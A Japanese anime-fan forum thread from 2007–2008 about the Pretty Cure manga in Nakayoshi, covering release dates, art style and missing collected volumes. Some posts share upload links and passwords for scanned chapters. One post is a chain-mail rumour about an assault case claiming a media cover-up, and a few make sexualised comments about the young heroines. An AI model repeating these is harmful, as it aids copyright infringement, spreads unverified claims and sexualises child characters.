こまちのお姉ちゃん巨乳だ・・・何となくアカネさんを髣髴とさせる

298 :花と名無しさん:2007/05/18(金) 21:45:44 ID:???0
イケメン

299 :花と名無しさん:2007/05/20(日) 20:33:17 ID:???0
宝塚記念ファン投票
https://sec.jra.go.jp/fant/form.html
0118 テイエムプリキュア に投票をお願いします。


300 :花と名無しさん:2007/06/02(土) 17:35:34 ID:KhwrvHgoO
発売日あげ
うららがかわいくて面白かったけど、
最後のページのうららははじけすぎてちょっと怖い…

301 :花と名無しさん:2007/06/02(土) 17:56:41 ID:???0
ttp://www.usamimi.info/~prettycure/love2/src/1180674668524.jpg
ttp://www.usamimi.info/~prettycure/love2/src/1180674704148.jpg

かれん様……。しかし今月号も、どいつもこいつも皆かわいいな。

302 :花と名無しさん:2007/06/02(土) 21:23:22 ID:???0
>>301
一枚目で何だか志村けんを思い出した

303 :花と名無しさん:2007/06/03(日) 02:22:51 ID:???O
ペッパーランチ心斎橋店女性監禁暴行事件

この事件を知らない人に教えてあげて下さい。
チェーンメール用本文

Pランチでレイプって本当?!


2007年の5/9に、大阪の心斎橋で0時過ぎに一人でPランチにご飯食べにいった女の子が、
いきなりお店のシャッター閉められて、そこの店の中で店長とスタッフにスタンガンで脅されて、
ムリヤリ睡眠薬のまされた後、人気のないガレージに連れ込まれて身ぐるみはがされて、4人くらいの男にマワされたんだって・・・

女の子はその日の朝、裸のまま必死で逃げて、たまたま近所の人が助けてくれたらしぃんだケド・・・
監禁されてたガレージには、何人ものクレカや保険証がたくさんあったらしいよ
もし逃げれなかったら・・・
どうなってたか分かんないよね

ラチられたのがその辺の道トヵじゃなくて、ご飯食べに行ったお店の中ってコワいょね!
フツーお店の人がそんなコトするとゎ思わないじゃん・・・

ホントに怖いのは、この話がニュースでほとんど流れないってコト
5/16に初めて新聞に出たけど、ワイドショーとかNHKでも全然でないんだって
逆になにもなかったコトのようになってるんだって!
警察もこの事件のコト発表しないんだって・・・

ネットしてる友達がいたらペッパーランチって聞いてみて


304 :花と名無しさん:2007/06/04(月) 03:14:18 ID:???0
一番はじけてるのはふたごセンセー!

305 :花と名無しさん:2007/06/06(水) 03:07:17 ID:???0
怖いよ舞
ttp://www.uploda.org/uporg841618.jpg

306 :花と名無しさん:2007/06/07(木) 01:08:04 ID:???0
>>301
この画像で切れてるのはこまちなんだけど…w
こまちが太ってるのを気にしてるのが意外で微笑ましかった

307 :花と名無しさん:2007/06/07(木) 04:02:51 ID:???0
アニメスレより転載

306 名前:風の谷の名無しさん@実況は実況板で[sage puri] 投稿日:2007/06/06(水) 06:26:58 ID:TbfHpQO8
ラブリー夏と第5話
ttp://up.mugitya.com/img/Lv.1_up16530.jpg.html
ttp://up.mugitya.com/img/Lv.1_up16531.jpg.html

しかしナイスバディとかハードでギンギンでワイルドとか
先生は天然で言ってるんだろうか

308 :花と名無しさん:2007/06/11(月) 20:51:15 ID:l0/2ib6AO
アニメ版と漫画版は同じ世界だと言う人いますが、
ほのかの誕生日の話や藤P先輩との初デートに着て行く
洋服選びに悩む話やクリスマスイヴのひかりの話等は
やはりアニメ版とは別だと思うのですが

309 :花と名無しさん:2007/06/11(月) 21:08:22 ID:???O
>>307
夏号ってもう売ってるの?

310 :花と名無しさん:2007/06/11(月) 22:00:25 ID:???O
>>309
初夏号と思われます。

311 :花と名無しさん:2007/06/17(日) 14:44:07 ID:???0
保守 …ってこの板でも必要?

312 :花と名無しさん:2007/06/22(金) 20:48:43 ID:???0
コミックスはいつでるんじゃ

313 :花と名無しさん:2007/06/22(金) 21:19:53 ID:???0
>>311
保守はどこでも必要だと思うよ


314 :花と名無しさん:2007/06/29(金) 10:55:51 ID:???O
もうすぐ8月号発売でございますな保守。

315 :花と名無しさん:2007/06/29(金) 10:56:47 ID:???O
もうすぐ8月号発売でございますな保守。

316 :花と名無しさん:2007/06/29(金) 12:39:29 ID:???0
8月号はナッツ祭り。
プリキュアの次に載ってる読み切りのトビラ裏カラーの広告ページにも要チェック。

317 :花と名無しさん:2007/06/29(金) 19:15:03 ID:???O
ナッツ祭ってことは、漫画版はミルクの登場する話ではないのか
って早いな、8月号の発売日っていつだっけ3日?

318 :花と名無しさん:2007/06/30(土) 22:53:18 ID:???O
TV放送で登場後何話か進むから、ラブリー夏号か9月号には普通に出てるのでは?

319 :花と名無しさん:2007/07/01(日) 11:28:09 ID:???0
SS以降背景はどうみてもCGだよね
赤松みたい

320 :花と名無しさん:2007/07/02(月) 07:01:43 ID:???O
CG背景で済ましているのは別に赤松だけじゃないぞ

321 :花と名無しさん:2007/07/02(月) 14:59:25 ID:???O
ナッツ、浴衣とゆーより着流しw
だがカコイイな。

322 :花と名無しさん:2007/07/02(月) 16:08:03 ID:???0
さすが俺のナッツ

323 :花と名無しさん:2007/07/02(月) 16:37:22 ID:???0
ナツりんですか

324 :花と名無しさん:2007/07/02(月) 21:24:55 ID:???O
浴衣の五人はキャッチュ着けてなかったけど、おそろいの巾着(?)持ってたからその中かな、てか、ソレもナッツ製?


しかしナッツは男前だったw
人型はりん、獣型とはこまちが似合うなww

325 :花と名無しさん:2007/07/03(火) 08:58:15 ID:???O
りんが特に可愛いかったが、5人ともほんと皆可愛いな
今月は色んな意味でドキドキしながら読めたw
りんが言った「らいねんはーっ みんなでいっしょにみようねーっ」の
来年には軽く反応してしまった

326 :花と名無しさん:2007/07/03(火) 14:25:15 ID:???0
「失敗だ!!」
「イマイチだ。これでは商品にならん」

ナッツ……
ちょ、おま……それスポンサーの……

327 :花と名無しさん:2007/07/03(火) 15:57:01 ID:???0
りんの口癖「もったいない」を使ってくるのはさすが原作者上北ふたご

328 :花と名無しさん:2007/07/03(火) 20:54:33 ID:???O
>>327 違うけどな。

なかよし出たばっかりで恐縮なんだが、ラブリー夏号って発売8月だっけ?7月終わり頃?

329 :花と名無しさん:2007/07/03(火) 21:13:47 ID:???0
>>326
次回
「あれー?ナッツはー?」
「ちょっと買出しにいくってさ」

その次
「今日もナッツいないねー」
「散歩って言ってたよ?」

さらに次
「最近ナッツ見ないよね」
「どうもここんとこタイミング悪いよなー」

330 :花と名無しさん:2007/07/03(火) 21:21:05 ID:???0
>>329
ナッツ……((;゚Д゚)ガクガクブルブル

331 :花と名無しさん:2007/07/03(火) 21:48:45 ID:???O
>>328
ラブリー夏号の発売日は7月17日

夏ラブリーに載りますと書いてあったから
今月は2週間先にまた読めるな

332 :花と名無しさん:2007/07/03(火) 23:36:05 ID:???O
>>331 dです。楽しみだなw

333 :花と名無しさん:2007/07/04(水) 09:45:07 ID:???0
かれんはりんナッツにちょっとヤキモチやいてるっぽい?

334 :花と名無しさん:2007/07/04(水) 11:49:32 ID:???0
一般的な意味で、恋愛に興味津々ってだけじゃないかな。
前にも、のぞみに「おひ、おひ、おひ……」
(訳・お姫様抱っこされるのってどんな気分?)って聞いてたし。
本人はオクテと見た。

335 :花と名無しさん:2007/07/04(水) 19:07:29 ID:???O
今月号読んで萌え心地になっているところへポップンビーズメーカーの宣伝ナッツを見て萎えた椰子。

ノシ


336 :花と名無しさん:2007/07/04(水) 21:12:52 ID:???0
>>335
もはや當眞美喜男さんだよね

337 :花と名無しさん:2007/07/05(木) 00:41:18 ID:???O
スプラッシュスター2巻だしてよぉ

338 :花と名無しさん:2007/07/05(木) 00:50:32 ID:???0
SS2巻出さない講談社は無能

339 :花と名無しさん:2007/07/06(金) 02:31:36 ID:???0
いや不能だ。オンデマンドコミックスなんてやってないでこっち来いよ

340 :花と名無しさん:2007/07/08(日) 18:00:38 ID:???O
>>331 来週の放送はシリアス話で2週連話らしいから合間に和めるなw

341 :花と名無しさん:2007/07/16(月) 18:11:45 ID:???O
のぞみ以外の4人が2コマしか出ていない件

342 :花と名無しさん:2007/07/17(火) 14:08:44 ID:???O

8月号はナツりん、ラブリー夏の号はココのぞ。


いいぞもっとやれwww

343 :花と名無しさん:2007/07/18(水) 00:56:43 ID:???0
ラブリー買ってきた。
プールが舞台なのに水着ナシって、そりゃないぜ、先生……。

344 :花と名無しさん:2007/07/19(木) 16:58:31 ID:???0
プリキュアらしいじゃないかw

345 :花と名無しさん:2007/07/19(木) 17:45:47 ID:???0
でも無体すぎるし、折角の舞台が死んでる。

346 :花と名無しさん:2007/07/20(金) 17:21:15 ID:???0
>>337
>>338
S☆S本スレでも書いたが、一応苦情文書送っといたから。
意味無いだろうけど、散々嫌味っぽいことも書いておいたし、
一応満足。

347 :花と名無しさん:2007/07/22(日) 10:38:42 ID:???O
>>346
DQN

348 :花と名無しさん:2007/07/22(日) 10:56:38 ID:???0
>>347
でも言わずには居られない状況が存在するのも確か

349 :花と名無しさん:2007/07/26(木) 14:41:20 ID:1FKsCWE10
過疎age

350 :花と名無しさん:2007/07/31(火) 18:00:18 ID:???O
そーいや9月号発売って何日だっけ?

351 :名無しさん@お腹いっぱい。:2007/08/01(水) 01:38:38 ID:???0
>>350
8/3(金)
セラムン以来全然読んでなかったが最近のなかよしは
少女漫画雑誌というよりアニメ雑誌の付録みたいだ…

352 :花と名無しさん:2007/08/02(木) 01:06:19 ID:???O

ウチの地元は2日に発売らしい。
明日(もう今日か)仕事帰りに買うかな。



353 :花と名無しさん:2007/08/02(木) 17:47:39 ID:???0
うちのコンビニ、以前はなかよし取ってたのに取らなくなったんだよなー
ちゃおだの少コミは入ってくるのに・・・orz

担当者になかよし入れてとは言い辛い

354 :花と名無しさん:2007/08/03(金) 09:48:08 ID:???O
アニメ本編ほどはっちゃけてはないけど
かれんはのぞみ達と一緒にいることで、感化される部分がかなりあったんだな
こまちも良い友達、というか親友だけど
この2人じゃ、はしゃぐなんてことはないだろうし

それにしてもナッツは弄られキャラだなw
のぞみ達の水着も描けるんなら、描きたかったんだろうなぁ

355 :花と名無しさん:2007/08/03(金) 22:22:30 ID:???O
のぞみに超かわいーって言われてる時の
キラキラしたかれんが綺麗だった
3ページ目の左上って歌手デビュー回アバンで
うららの早口言葉に感心してる
のぞみとりんのカットと同じだよな?
あのカットがふたご先生のお気に入りなのか

356 :花と名無しさん:2007/08/11(土) 13:19:32 ID:???0
なかよし買う所見られてもどうって事無いが、
ふたご読んでる時のニマニマした顔は見られたくないな

357 :花と名無しさん:2007/08/15(水) 03:16:51 ID:???O
>>356
共感した。

358 :花と名無しさん:2007/08/20(月) 11:37:43 ID:???O

浴衣姿はふたご先生ver.の方が断然良かったな。



359 :花と名無しさん:2007/08/22(水) 00:53:46 ID:???0
とくにイケメンはね

360 :花と名無しさん:2007/08/28(火) 14:02:07 ID:???O

保守。

なかよしは来週発売だったかな?



361 :花と名無しさん:2007/09/02(日) 17:18:48 ID:???O
誰もいない……
|ω・`)


誰か……感想だけでも……

362 :花と名無しさん:2007/09/02(日) 17:20:05 ID:???O
いつも以上にガチホモだった

363 :花と名無しさん:2007/09/02(日) 19:41:45 ID:???O
すごかったなぁ

もふもふどもが可愛かった

364 :花と名無しさん:2007/09/02(日) 20:00:25 ID:i+XMfDnv0
プリキュアファン必見だよー
http://pc11.2ch.net/test/read.cgi/yahoo/1188723352/

365 :花と名無しさん:2007/09/03(月) 12:48:35 ID:???O

なかよし買ってきた。

ツヤツヤ黒光りに りんちゃん失神の巻。

ココとナッツ 男の闘いの巻。

だったな。



366 :花と名無しさん:2007/09/03(月) 13:23:30 ID:???O
ココとナッツがアッー!する話を期待している

367 :花と名無しさん:2007/09/03(月) 15:19:11 ID:???0
5人が組んずほぐれつ…あられもない姿がヨカタ
悲鳴が「きゃあ〜」じゃなくて「ギャー!」なのも。

368 :花と名無しさん:2007/09/03(月) 15:38:23 ID:???O
>>361
感想か。
もふもふ好きなら今回だけでドンブリ3杯はペロリだな。




ん? ギリンマさんがいたような気がするが…気のせいか。

369 :花と名無しさん:2007/09/03(月) 15:53:50 ID:???O
ココナッツ頑張ってたな。
可愛かったw

370 :花と名無しさん:2007/09/04(火) 11:21:20 ID:???0
こまちは島本和彦でも読んだのか

371 :花と名無しさん:2007/09/12(水) 10:22:07 ID:???O

ラブリーって来月だっけ?



372 :花と名無しさん:2007/09/24(月) 15:54:59 ID:???O

ほす。



373 :花と名無しさん:2007/10/03(水) 05:44:57 ID:???0
まじで?

374 :花と名無しさん:2007/10/05(金) 23:19:50 ID:???O

今月はのぞみママの話だったな。

ラブリーに期待だ。



375 :花と名無しさん:2007/10/06(土) 00:34:34 ID:???0
ウェディングドレス・ネタでもきっちり話を変えてくるってことは、
話の中心となるアイテムだけ共通で、ストーリーはふたご先生に任されてるのかな?
シナリオを読んだ上で、あえて変えてるというのも、それはそれでありそうだが。

376 :花と名無しさん:2007/10/16(火) 13:47:12 ID:???0
変身&戦闘なしがデフォになってきたな。

377 :花と名無しさん:2007/10/27(土) 01:56:13 ID:???0
幽体離脱!

378 :花と名無しさん:2007/10/30(火) 19:28:23 ID:???0
一巻まだ

379 :花と名無しさん:2007/11/01(木) 01:33:15 ID:???0
まどかさんとこまちの幽体離脱は良かったな
あれ映画館でザ・タッチとやってほしいんだが

380 :花と名無しさん:2007/11/01(木) 09:40:02 ID:???0
あれ面白かったねw
2巻予定で1巻しか出なかった今までと違って今度は1巻予定らしいページ数だから
ぶつ切りにならずすみそうだね

381 :花と名無しさん:2007/11/02(金) 11:25:24 ID:???0
一巻限りは寂しいけど、ぶつ切りで終わられるよりは遥かにましだねぇ。
本編1冊、映画版1冊出てくれるといいな。

382 :花と名無しさん:2007/11/04(日) 16:29:16 ID:???0
「なかよし」は月刊で戦闘シーンはなし。
というわけで、ふたご先生の1話はアニメの5〜6話分ぐらいの進行速度。
今回はかなり重要な内容になってるね。

383 :花と名無しさん:2007/11/05(月) 08:59:59 ID:???0
うむ、いよいよのぞみは「14歳の母」路線一直線か!

384 :花と名無しさん:2007/11/12(月) 00:31:09 ID:???0
すんません
映画コミックスは出ないの?

385 :花と名無しさん:2007/11/12(月) 12:02:59 ID:???0
なんか、アニメコミックスみたい。


386 :花と名無しさん:2007/11/13(火) 11:17:24 ID:???0
上北ふたご ふたりはプリキュア スプラッシュ☆スター
単行本未収録分。DLパスは目欄
ttp://www10.axfc.net/uploader/11/so/O_30672.zip.html

387 :花と名無しさん:2007/11/13(火) 13:04:38 ID:???0
超GJ!

388 :花と名無しさん:2007/11/13(火) 15:10:22 ID:???0
まいまいーっ

389 :花と名無しさん:2007/11/13(火) 16:21:32 ID:???0
>>375
1・2話の大筋はアニメとほぼ同じ、それ以降は日常話重視でオリジナルの要素が強いな
一作品で二度楽しめるから嬉しい

390 :花と名無しさん:2007/11/19(月) 20:04:27 ID:???O
てかホントに1巻出るのか?
なんか心配になってきたぞ。

今までも劇場版だけは必ず出たのに…

391 :花と名無しさん:2007/11/19(月) 23:03:50 ID:???0

コミックスのせいで劇場版の動員が減っていたせいではないのか?、
藤子不二雄作品みたいに映画原作コミックスと映画そのものが
同時期に両立できるほど市場も大きくないからな。

392 :花と名無しさん:2007/11/22(木) 05:24:28 ID:???O
確かに映画館に行かずマンガでストーリーを楽しんでたが…酷だ…あんまりだ…orz

393 :花と名無しさん:2007/11/22(木) 11:15:17 ID:???O
毎年、映画を見るまではと
漫画を発売日に買っても読まずに我慢していたが

その苦行も無いと淋しい

394 :花と名無しさん:2007/11/23(金) 16:37:56 ID:???0
>>391
影響するようなもんでもないだろう。

395 :花と名無しさん:2007/11/25(日) 23:07:55 ID:???O
誰か今までのプリ5まとめてうぷしてくれないかなー

396 :花と名無しさん:2007/11/26(月) 03:27:07 ID:???O
なぎほの未収録もほしいわ
もしかしてどこかで落とせる?

397 :花と名無しさん:2007/11/26(月) 20:15:34 ID:???0
>>386
今更だけど頂きました。ありがとう

どうせ単行本出るだろうとタカを括って本誌を読んでおかなかったことを
後悔してたから、読めて嬉しいよ
今からでも二巻出してくれないかなぁ…

398 :花と名無しさん:2007/11/29(木) 00:01:35 ID:???0
SSも欲しいがとりあえず5のを一冊でも出さんかコラなかよし編集部

399 :花と名無しさん:2007/11/29(木) 11:00:17 ID:246ZvmCl0
国立国会図書館にいけば
バックナンバー読めるよ。


400 :花と名無しさん:2007/11/29(木) 11:01:20 ID:246ZvmCl0
学術研究目的なら
コピーもできるww

401 :花と名無しさん:2007/11/29(木) 15:34:59 ID:???0
これか
ttp://sakuratan.ddo.jp/imgboard/img-box/img20071129152029.jpg

402 :花と名無しさん:2007/11/30(金) 01:59:10 ID:???0
無印とMHの前半をいつか読んでやるぜ

403 :花と名無しさん:2007/11/30(金) 07:52:18 ID:???O
>>391
「いつかドラえもんが俺を助けに来てくれる」まで読んだ

404 :花と名無しさん:2007/12/01(土) 03:54:38 ID:???0
>>399
懐漫板でよく話題にあがる国会図書館ってどんだけデカいの?
遠いし敷居高いな。

405 :花と名無しさん:2007/12/01(土) 15:43:55 ID:???0
遠隔複写サービスがあるよ。
ttp://www.ndl.go.jp/jp/service/copy.html



406 :花と名無しさん:2007/12/01(土) 17:43:24 ID:???0
>>404
雑誌のコーナーは特定の場所なんでそんなにでかくない。
身分証明が必要で未成年は入れない。
一回に借り出せる本の厚みが決まってるんで、厚い本だとたくさん借りれない。
広大な地下の倉庫から職員さんが探してくるんで、申し込んでから読むまでえらい時間が
かかる。
貴重本の閲覧なんかは特別な部屋に入れられるんでちょっと緊張する。

コピーは福祉団体がやってるんだよね。

407 :花と名無しさん:2007/12/05(水) 02:24:47 ID:???0
どうも、ここんところ、のぞココに重点置きすぎて
イマイチな感じ。

408 :花と名無しさん:2007/12/05(水) 11:58:13 ID:???0
しかし、ふたご先生は明らかに楽しんでいる。
やっぱり少女漫画ですもん、正統派恋愛のシーン、やりたくてウズウズしてたんだろうなぁ。

409 :花と名無しさん:2007/12/05(水) 12:01:48 ID:???O
少女漫画ですから…
どれだけ本来のターゲット層が読んでるのか知らないけど
少なくとも単行本買う奴は18歳以上が多いだろ
コレw

410 :花と名無しさん:2007/12/07(金) 13:20:25 ID:???0
漫画版の何が凄いってミルクとか完全無視してる所だよな
存在自体ないw
あのあとのぞみはココを届けるだけで終わったんだろうか

411 :花と名無しさん:2007/12/10(月) 00:13:33 ID:???0
若干スレ違いだがふたご先生話題なのでちょっと

平成タイムボカンに続いて新ヤッターマンでもキャラデザ担当確定らしい
タツノコ仕事なので上北双子名義だが
映画書き下ろしを引き受けなかったのはタツノコ仕事に戻っていたからかも
と言ってみる

412 :花と名無しさん:2007/12/12(水) 09:16:23 ID:???0
>>411
有り得るね。元々アニメーターだから。つか、それ本業だし

でも、戻ったらまた絵がタツノコっぽくなる予感。プリキュア始めた頃も動きを付けるときの描線の歪ませ方とか
東映アニメのそれじゃなくてタツノコ風だった。

413 :花と名無しさん:2007/12/12(水) 15:59:47 ID:???0
>>412
S☆Sと同時期にラブリーでタツノコのアクビガールを描いていたが
細やかで美しい咲舞の描き方とは全く違って王道タツノコ絵だったよ
描き分けが出来る器用さがあるのが上北ネ申なので
心配はいらん  たぶん

しかし自分は初期のタツノコ味残した画風が一番好みだった
初代連載開始の前号1P予告まで保存してある自分上北儲

414 :花と名無しさん:2007/12/12(水) 18:09:53 ID:???0
顔立ちとかプロポーションのバランスから行くと、おれはS☆Sが好みかな。
でも、毎年エロくなっているような気がする。
今の5は、さらにアダルトっぽさが進んで、
それでいて、あどけなさの残るのぞみを描いてるもんだからヤヴァイ、


415 :花と名無しさん:2007/12/22(土) 17:42:06 ID:???0
来年の5GOGOも描いてくれ…
ていうかとりあえずコミックス一冊でも出せよ

416 :花と名無しさん:2007/12/27(木) 14:15:31 ID:???0
いや、GOGOはもういいだろ。
5自体もコミックス出さないみたいだし。
ふたご先生はアニメでがんばってくれればそれでいいよ

・・・・みたいなこといってもGOGOの漫画は絶対描くだろうから特に要望しない。

417 :花と名無しさん:2007/12/27(木) 22:17:44 ID:???0
まじかよ・・・<コミックス出さない

418 :花と名無しさん:2007/12/28(金) 20:54:45 ID:???O
ページ数的にちょうど1冊にまとまる量なのに

419 :花と名無しさん:2007/12/28(金) 21:05:11 ID:???0
ttp://www.usamimi.info/~prettycure/love2/src/1198813467214.jpg

420 :花と名無しさん:2007/12/29(土) 11:45:42 ID:???O
GOGOも描くから単行本は出るんじゃない? 少なくとも半年以内には……出なかったらなかよしのアンケで要望しようかな

421 :花と名無しさん:2007/12/29(土) 12:48:14 ID:???0
思うに、講談社としては単行本を出してもふたごセンセーだけでなく東映、バンダイとか
色んな所にも利潤を分けなきゃいけないから出版しても黒字が薄いから出さないのかも

422 :花と名無しさん:2007/12/29(土) 13:43:00 ID:???O
SS2巻とセットで出してくれたら神
まああんまり無理は言えないけど

423 :花と名無しさん:2007/12/29(土) 17:21:58 ID:???0
展開に無理あったけど読みながら涙でそうだった
でも続きあるんだよねw

424 :花と名無しさん:2007/12/29(土) 18:19:08 ID:???0
しっかり来月号の予告に名を連ねてましたなww
決戦かっ飛ばして後日談になってるとは思って無くて不意打ちだった

425 :花と名無しさん:2007/12/30(日) 03:00:54 ID:???0
どうせGOGOは空気。

426 :花と名無しさん:2008/01/09(水) 12:41:07 ID:???0
ようやくラブリー買ってきたが、プリキュアじゃなかったのか。
まー50ページもあるし、これはこれでいいか。
しかしいつも買ってるところで売り切れで焦った。
秋号まではあったのに。他店にもなかなかなくて、4軒目で見つけた。

2月号はアニメ最終回まで封印。


427 :花と名無しさん:2008/01/09(水) 17:01:34 ID:???0
ラブリーの、ふたご先生オリジナル漫画ってどんなの?

428 :花と名無しさん:2008/01/09(水) 17:13:37 ID:???0
なかよしのアンケートで単行本化をお願いしまくろうか…

429 :花と名無しさん:2008/01/12(土) 21:35:11 ID:???0
単行本ってなぎほの時代に何冊か出てるくらいだよな?
今見返すとかなり絵が上達してる

430 :花と名無しさん:2008/01/14(月) 16:15:14 ID:???O
SSで二冊だしてる
一番出来が良いのもそれ

431 :花と名無しさん:2008/01/14(月) 21:10:55 ID:???0
びびった平成ヤッターマンのキャラデザふたご神じゃん!
1号が初恋だったから心底動揺してるwwww
グッズとか雑誌の特集とか描いてくれるかな?


432 :花と名無しさん:2008/01/15(火) 20:59:23 ID:???0
ラブホース正統派ラブコメ楽しめた
最後の騎乗位!ふたごは判っててやってるのか天然なのか悩む
それにしてもチャーリーとか、無印のときのメリーゴーランドとか馬描くの巧いナー
ふたご先生も乗馬クラブに通ってんのかな


433 :花と名無しさん:2008/01/20(日) 02:15:49 ID:???0
誰かスプラッシュスター再うpお願いできませんか?
最近漫画版に手を出したんだけど
一番いいとこで終わりになってて泣ける


434 :花と名無しさん:2008/01/21(月) 19:49:08 ID:???0
>>433
いるか?

435 :花と名無しさん:2008/01/21(月) 19:57:56 ID:QZ+4LGMi0
いる

436 :花と名無しさん:2008/01/21(月) 20:31:46 ID:???0
>>435
じゃ、今からあげてくるわ

437 :花と名無しさん:2008/01/21(月) 20:39:34 ID:???0
アルカン小14500 
p 米欄
日付変わる頃消す

438 :花と名無しさん:2008/01/22(火) 22:06:37 ID:???0
>>437
許されるならもう一回お願いしたい
ていうか435は俺じゃないんだ
カワリーノか何かだ きっと

439 :花と名無しさん:2008/01/23(水) 00:27:22 ID:???0
40M超なんだよなぁ。

440 :花と名無しさん:2008/01/23(水) 01:51:10 ID:???0
>>438
今日の日付変わる頃来い
レスあったらもう一度うpる

441 :花と名無しさん:2008/01/23(水) 02:00:51 ID:e+pbyZly0
435なのに、逃したぁぁぁぁぁ

442 :花と名無しさん:2008/01/23(水) 14:02:57 ID:???0
誰が落としてるんだよw
まぁ、過疎スレっぽいから仕方ないか。

443 :花と名無しさん:2008/01/23(水) 21:36:11 ID:???0
やった!ありがとう>>440の人!


444 :花と名無しさん:2008/01/23(水) 23:58:01 ID:???0
>>433
>>435
いるか?

445 :花と名無しさん:2008/01/24(木) 00:08:38 ID:???0
ほしいです!

446 :444:2008/01/24(木) 00:15:44 ID:???0
>>445
433、435さん?

447 :花と名無しさん:2008/01/24(木) 00:21:54 ID:???0
いえ、違います……
横からすいません……
私もS☆Sのコミックの続きが読みたくてつい……

448 :444:2008/01/24(木) 00:23:01 ID:???0
>>447
じゃ、もうちょっと待ってて

449 :444:2008/01/24(木) 00:45:43 ID:???0
ウルグアイ1237
咲の妹

450 :花と名無しさん:2008/01/24(木) 00:58:59 ID:???0
ありがとうございます!
いただきました!!

451 :花と名無しさん:2008/01/24(木) 01:21:36 ID:???0
落とせました!ありがとう444の人!

452 :444:2008/01/24(木) 01:52:28 ID:???0
2時頃消します

453 :花と名無しさん:2008/01/24(木) 03:43:43 ID:???0
ああああおとせなかったああああ・・・

454 :花と名無しさん:2008/02/01(金) 11:18:34 ID:???0
3月号ゲト
「メタモルフォーーーーゼ!!」で変身してた

455 :花と名無しさん:2008/02/03(日) 01:31:19 ID:???0
ふたご先生ファイトですよ

456 :花と名無しさん:2008/02/03(日) 04:47:28 ID:???0
積んでいたなかよし1、2月号を今頃読んで、
ラブリーにお嬢様まんがを描いてたことをさっき知って半分涙目。

457 :花と名無しさん:2008/02/04(月) 06:46:48 ID:???0
そういや、ラブリー買ってあるけど、まだ見てないや。

458 :花と名無しさん:2008/02/04(月) 15:05:28 ID:???0
プリキュアで貧乳娘しか描いていないので、ストレスがたまってたのか、
やたら胸が強調されてるマンガだった。

459 :花と名無しさん:2008/02/10(日) 09:47:02 ID:???O
コミクスマダー?

460 :花と名無しさん:2008/02/16(土) 19:33:51 ID:???0
去年の連載開始時の絵が一番好きだったんだが、どうだろう

461 :花と名無しさん:2008/02/18(月) 17:34:54 ID:???0
俺もS☆Sの絵柄が好き。
無印&MH時代は、どちらかというとコミカルでアニメっぽい絵柄。
S☆Sはコミカルとリアルのバランスが素晴らしくて、妙な色気もある(大友向きとも言うが)。
5はリアル路線にシフトしてるが、少女漫画らしいと言えば、そんな感じ。
たぶん、のぞみの恋愛シーンをキチンと描きたかったんだろうなぁと思う。
自然と変化してるのか、わざと変えてるのかは、不明だが。


462 :花と名無しさん:2008/03/04(火) 00:41:35 ID:???0
なかよし付録にドリームライブのカードが入ってた
付録にプリキュア登場は初めてじゃないか?

463 :花と名無しさん:2008/03/04(火) 13:39:51 ID:???0
2号連続で表紙カラーも初だと思う。

464 :花と名無しさん:2008/03/04(火) 14:10:51 ID:???0
カード……他の付録に押しつぶされてて、しわくちゃになってた……orz

465 :花と名無しさん:2008/03/04(火) 17:57:54 ID:???0
>>464
自分もだ
今布団の下においてちょっとはマシにならないか悪あがき中…

466 :花と名無しさん:2008/03/04(火) 18:27:33 ID:cyajjMDA0
>>459コミックスは放送開始から遅く発売するから、それまで期待しろって感じ…。

467 :花と名無しさん:2008/03/06(木) 17:38:15 ID:???O
>>462
なぎほの時代に組み立て式付録がついたことがある

468 :花と名無しさん:2008/03/17(月) 17:45:30 ID:???0
ラブリーは載ってる?
本屋で表紙をじっくり確認すれば良いんだろうが、さすがに敷居が高すぎる
載っているのなら、ささっ!と手にしてレジに持っていって速攻で買って本屋を離脱するんだが

469 :花と名無しさん:2008/03/17(月) 18:13:23 ID:???0
載ってるよー>ラブリー
長編ではなかった気がする

470 :花と名無しさん:2008/03/21(金) 14:20:38 ID:???0
そういや3月17日発売のラブリーは
プリキュア載ってるんだろうか?
封されて立ち読みできないorz


471 :花と名無しさん:2008/03/21(金) 17:44:13 ID:???0
載ってるよ!ページ少ないけど
ふたご神の美し

472 :花と名無しさん:2008/03/22(土) 00:31:36 ID:???0
>>471
dクス!早速読んできた!
シロップがパシられててワロタw

473 :花と名無しさん:2008/03/22(土) 22:36:39 ID:???0
ミルク登場は5月号かな

474 :花と名無しさん:2008/04/02(水) 22:52:25 ID:???O
漫画で獣版ミルクスルーだったのに今回出るのかな? ちなみに今月はシロップとのぞみ話。メルポスルー……

475 :花と名無しさん:2008/04/04(金) 00:46:40 ID:???O
なんかおジャ魔女を思い出した
漫画版はハナちゃんスルーだったのに、後々アニメではハナちゃん大きくなって重要キャラになってしまった

ミルクの存在はココとナッツが説明するだろうけど
そうなるとミルキィになるために青薔薇の力を授かる経緯も描かなきゃいけないし

漫画版はミルク≠ミルキィローズとして、ミルクの存在はスルーされるかもしれないね

476 :花と名無しさん:2008/04/04(金) 02:04:05 ID:???O
現れたミルキィローズが獣ココナツを見つけて喜ぶ

私です、ミルクです!

人間になる前に偶然出した獣写真入りの手紙をシロップが届ける

パルミエのこの子がミルキィローズに!?


という展開を考えたが無理だな…
ミルク今作もスルーかも

477 :花と名無しさん:2008/04/04(金) 08:24:06 ID:???0
いまスプラッシュスターの二巻が発売されないことを知ったぞ
律儀に待ってた俺涙目だぞ


478 :花と名無しさん:2008/04/04(金) 18:15:37 ID:???0
なんだと!けしからん!けしからんぞおおお!!

479 :花と名無しさん:2008/04/07(月) 22:43:41 ID:nYw0/Io3O
プリキュア5の単行本っていつ発売だろうなぁ

480 :花と名無しさん:2008/04/07(月) 22:47:25 ID:???0
それを言うなら、発売するのかなあ、だな…

481 :花と名無しさん:2008/04/08(火) 00:08:32 ID:???0
今月もすげえな。エロエロだ。
しかも、ダイレクトにエロなのではなく、サブリミナル的にエロスな記号を散りばめている。
幼女は普通に楽しめる一方、大友はのたうち回るというメタ構造だ。
あと、シロップの「ちょ……おま……」は吹いた。
でも、一番ぶったまげたのは「リボンの騎士」連載開始。ちょっと唖然としてしまった。


482 :花と名無しさん:2008/04/08(火) 01:51:08 ID:???0
ドリームのへそが見えなくなってなんだかガッカリしてたら
今月号で眠ってるのぞみがへそチラしててちょっと得した気分
あれは先生からのプレゼントだと勝手に思っておく

483 :花と名無しさん:2008/04/08(火) 20:08:13 ID:S03vyjLMO
>>480
どっちも似たようなもんだろwwww

484 :花と名無しさん:2008/04/10(木) 20:11:44 ID:???0
07年のラブリーって冬の号だけ載ってなかったんだっけ?

485 :花と名無しさん:2008/04/11(金) 07:20:52 ID:???0
>>484
そう。12月発売号だけふたご先生の漫画は乗馬クラブを舞台にしたものだった。
ラブリー3,5,7,10月分はプリキュア5が載ってたから
